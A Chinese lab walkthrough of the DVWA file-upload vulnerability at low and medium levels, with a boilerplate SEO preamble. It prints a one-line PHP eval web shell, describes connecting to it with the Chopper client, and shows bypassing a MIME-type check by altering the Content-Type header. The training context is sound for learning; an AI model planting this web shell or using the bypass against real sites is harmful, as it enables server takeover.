龙空技术网

文件上传漏洞(low,medium,high)

之乎者也吧呀 244

前言:

现时各位老铁们对“php自大”大致比较讲究,兄弟们都需要分析一些“php自大”的相关知识。那么小编同时在网上网罗了一些关于“php自大””的相关资讯,希望姐妹们能喜欢,各位老铁们一起来学习一下吧!

一、环境:dvwa

二、选择Upload,low级别

1、上传1.php文件和1.jpg文件都没问题

PHP文件内容为:

<?php @eval($_POST["abc"]);?>



2、访问我们上传的文件

可以看到图片

什么都看不到

3、用菜刀链接1.php文件,点击添加




4、双击链接进入



三、选择Upload,medium级别

1、上传2.php文件和2.jpg文件,发现不能上传2.php

2、点击view source



3、这里限制了上传类型,抓包修改上传类型



4、我们将text/plain修改为image/jpeg,成功上传



5、用菜刀链接一下


四、选择Upload,high级别

参考小课堂 -- 文件包含漏洞


禁止非法,后果自负

欢迎关注公众号:web安全工具库

标签: #php自大